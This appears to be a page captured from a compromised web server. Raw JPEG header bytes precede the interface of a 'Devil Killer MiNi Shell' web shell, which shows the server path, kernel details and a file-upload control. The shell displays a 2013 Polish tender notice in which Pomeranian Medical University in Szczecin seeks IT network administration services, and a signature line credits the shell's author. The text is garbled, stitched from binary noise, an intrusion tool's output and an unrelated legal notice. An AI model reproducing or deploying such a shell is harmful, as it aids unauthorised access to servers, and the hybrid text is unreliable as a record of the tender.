JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/88412-N-2013.html

<p class="kh_header"><b>Szczecin: kompleksowa obsługa informatyczną PUM</b><br>
<b>Numer ogłoszenia: 88412 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorski Uniwersytet Medyczny w Szczecinie , ul. Rybacka 1, 70-204 Szczecin, woj. zachodniopomorskie, tel. 91 4800703, faks 91 4800705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pum.edu.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> kompleksowa obsługa informatyczną PUM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
1)	zarządzanie i administrowanie aktywnymi urządzeniami sieciowymi oraz świadczonymi przez nie usługami w skład których wchodzą między innymi: przełączniki zarządzalne wartwy drugiej i trzeciej HP ProCurve; routery UTM Fortigate; Switche SAN i LAN z infrastruktury HP blade C3000, oraz ich aktualizowanie
2)	wykonywaniem okresowych kopii zapasowych konfiguracji urządzeń sieciowych oraz ich właściwe przechowywanie oraz dokumentowanie,
3)	zarządzenia, administrowanie oraz aktualizowanie oprogramowania firewall/NAT/Router na bazie Linuxa.  
4)	zarządzanie i administracja klasami adresowymi oraz wydzielonymi fragmentami sieci VLANami w tym routing i NAT dla vlanów,
5)	tworzenie, zarządzanie i administrowanie dostępem VPN typu site-to-site dla zdalnych lokalizacji,
6)	zarządzanie i administrowanie systemem sieci bezprzewodowej, zapewnienie ciągłości działania oraz poprawności autoryzacji użytkowników - studentów i pracowników,
7)	bieżące uaktualnianie przez Wykonawcę istniejącej szczegółowej dokumentacji technicznej dot. infrastruktury sieciowej oraz przygotowanie dokumentacji dla powstałych w ramach realizacji umowy nowych usług, fragmentów sieci, itp., w tym m.in. prowadzenie ewidencji w systemie elektronicznym listy publicznych adresów IP, listy stałych wewnętrznych adresów IP w różnych segmentach sieci, listy VLANów,  listy przełączników zarządzanych i urządzeń sieciowych,
8)	utrzymywanie aktualnej bazy haseł dostępowych do urządzeń i oprogramowania w systemie elektronicznym w sposób bezpiecznym, zabezpieczony  i dostępny dla Działu Informatyki PUM
9)	nadzór nad łączami sieciowymi (światłowodowymi i miedzianymi) - zapewnienie ciągłości pracy sieci,
10)	monitorowanie sieci pod kątem bezpieczeństwa tzn. ochrona antywirusowa i ochrona przed niepowołanym dostępem z zewnątrz,
11)	prowadzeniu analiz wyjaśniających nietypowe błędy bądź niezgodne z założeniami zachowanie systemów informatycznych,
12)	kontrola dostępu do treści w ramach sieci (w tym m.in. filtrowanie zawartości stron www, blokowanie niepożądanych aplikacji na poziomie sieci, blokowanie kategorii stron www, blokowanie usług sieciowych),
13)	monitoring procesów i sprawnego funkcjonowania sieci, bieżąca inwentaryzacja zasobów informatycznych, 
14)	kontrola i zabezpieczenie ruchu przychodzącego z sieci Internet,
15)	nadzór nad strefą DMZ przeznaczoną dla serwerów oraz administrowanie siecią zewnętrzną,
16)	kontrola całego ruchu wychodzącego oraz archiwizacja nagłówków pakietów w celach dowodowych w przypadku naruszenia przez użytkowników obowiązujących przepisów wewnętrznych lub zewnętrznych przez okres 24 miesięcy,
17)	konfiguracja i rekonfiguracja stacji roboczych użytkowników w zakresie dostępu do sieci Internet (połączenia przez sieć lokalną i modemy),
18)	współpraca z jednostkami organizacyjnymi PUM przy rozwiązywaniu problemów związanych z modyfikacją i rozbudową lokalnych sieci Internetu w lokalizacjach wskazanych w ust. 2 poniżej,
19)	konfiguracja i rekonfiguracja oprogramowania umożliwiającego korzystanie z poczty elektronicznej na stacjach roboczych użytkowników,
20)	kształtowanie polityki rozwoju i modernizacji sieci informatycznych Zamawiającego i podległych mu jednostek przy stałej współpracy z Działem Informatyki PUM i Samodzielną Pracownią Informatyki Medycznej i Badań Jakości Kształcenia PUM,
21)	sprawowanie dyżuru serwisowego w Domach Studenckich Zamawiającego przy ul. Dunikowskiego 2, 4 i 6 w Szczecinie w okresie 1-go października do 15-go listopada każdego roku trwania umowy, jeden ustalony ze Zamawiającym dzień w tygodniu w godz. 15.00-20.00, w celu zapewnienia pomocy informatycznej w rozwiązywaniu problemów studentów związanych z podłączeniem do sieci komputerowej Zamawiającego i korzystania z Internetu.
22)	zarządzanie i administrowanie siecią oraz infrastrukturą informatyczną domów studenckich przewodową i bezprzewodową oraz świadczenie usług dostępu do sieci Internet,
23)	Instalacja oprogramowania antywirusowego na komputerach użytkowników Zamawiającego
24)	usuwaniu awarii (błędów oraz usterek) w funkcjonowaniu posiadanego przez Zamawiającego oprogramowaniu oraz sprzętu wymienionego w punktach powyżej, chyba, że do usunięcia awarii lub usterki oprogramowania lub sprzętu, w tym sieciach informatycznych, poszczególnych zestawach komputerowych konieczna jest interwencja producenta bądź podmiotu posiadającego prawa autorskie.
25)	planowanie w zakresie funkcjonowania, fragmentaryzacji i wykorzystania sieci w oparciu o istniejącą infrastrukturę, jak również jej rozbudowę,
26)	zarządzanie i administrowanie systemem bieżącego informowania o zmianach stanu dostępności routerów, przełączników zarządzalnych, punktów dostępu sieci radiowej oraz serwerów i usług sieciowych,
27)	zarządzanie i administracja systemem monitorowania ruchu oraz prowadzenie statystyki i ewidencji ruchu sieciowego w postaci wykresów MRTG, Zabbix, itp.,
28)	zarządzanie systemem antywirusowym oraz kontrola funkcjonowania programu na wszystkich stacjach roboczych i serwerach Uczelni, (za wyjątkiem budynku Rektoratu) w tym:
a)	administracja serwerem systemu antywirusowego,
b)	opracowywanie harmonogramu skanowania, 
c)	przeglądanie bieżących raportów z systemu antywirusowego i podejmowanie działań w przypadku nieprawidłowości,
d)	zapewnienie ochrony antywirusowej na stacjach roboczych,
e)	zapewnienie nieprzerwanego dostępu do aktualizacji programu antywirusowego,
f)	podejmowanie działań w przypadku braku programu antywirusowego na stacjach roboczych bądź nieprawidłowego działania programu,
g)	aktualizacja do najnowszych wersji systemu antywirusowego oraz baz antywirusowych,
29)	współadministrowanie siecią wewnętrzną LAN, serwerami oraz usługami DHCP i DNS, 
30)	zarządzanie systemem zabezpieczeń, podtrzymania awaryjnego i zasilania w kluczowych punktach sieci komputerowej (PPD i GPD) oraz jej rozwój i modernizacja zgodnie z regulaminem informatycznym,
31)	świadczeniu usług doradczych m.in. poprzez udział w pracach związanych z zakupami sprzętu sieciowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>, tzn. w okresie ostatnich 3 lat wykonali z należytą starannością co najmniej 1 usługę podobną do przedmiotu zamówienia na kwotę 100 000 brutto zł , za usługę podobną do przedmiotu zamówienia Zamawiający uzna wykonanie obsługi  poniższych urządzeń typu: 
- przełączniki zarządzalne wartwy drugiej i trzeciej HP ProCurve lub równoważne; 
- routery UTM Fortigate lub równoważne,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	posiadają wiedzę i doświadczenie, tzn. w okresie ostatnich 3 lat wykonali z należytą starannością co najmniej 1 usługę podobną do przedmiotu zamówienia na kwotę 100 000 brutto zł , za usługę podobną do przedmiotu zamówienia Zamawiający uzna wykonanie obsługi  poniższych urządzeń typu: 
- przełączniki zarządzalne wartwy drugiej i trzeciej HP ProCurve lub równoważne; 
- routery UTM Fortigate lub równoważne, 
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez zamawiającego.

Ocena spełniania warunków uczestnictwa w postępowaniu dokonana zostanie 
w oparciu o przedłożone dokumenty na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków uczestnictwa w postępowaniu dokonana zostanie 
w oparciu o przedłożone dokumenty na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tzn. dysponują co najmniej 2 osobami mogącymi wykonywać przedmiot zamówienia, które:
b) posiadają doświadczenie w wykonywaniu nast. czynności:
- podłączanie sieci logicznej na paczpanelach i lokalizacja uszkodzeń na sieciach teleinformatycznych, 
-  konserwacja okablowania strukturalnego (okablowanie miedziane kategorii 5e i wyższej, okablowania światłowodowe);
- posiadają doświadczenie w administrowaniu sieciami: 
osoby wykonujące przedmiot zamówienia obowiązane są posiadać dokument potwierdzający ukończenie dowolnych szkoleń i/lub zdania egzaminów dla administratorów sieci wydany przez uprawnioną do tego firmę lub instytucję (np. Cisco CCNA, Microsoft MCP, MCIT, Linux, itd.)

Ocena spełniania warunków uczestnictwa w postępowaniu dokonana zostanie 
w oparciu o przedłożone dokumenty na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają ubezpieczenie od odpowiedzialności cywilnej kontraktowej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000 zł.
Ocena spełniania warunków uczestnictwa w postępowaniu dokonana zostanie 
w oparciu o przedłożone dokumenty na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pum.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POMORSKI UNIWERSYTET MEDYCZNY 
W SZCZECINIE
UL. RYBACKA 1, 70-204 SZCZECIN
FAX: (091) 48-00-792.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2013 godzina 10:00, miejsce: Oferty składa się w siedzibie zamawiającego mieszczącej się w Szczecinie przy ulicy Rybackiej 1, w pok. 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com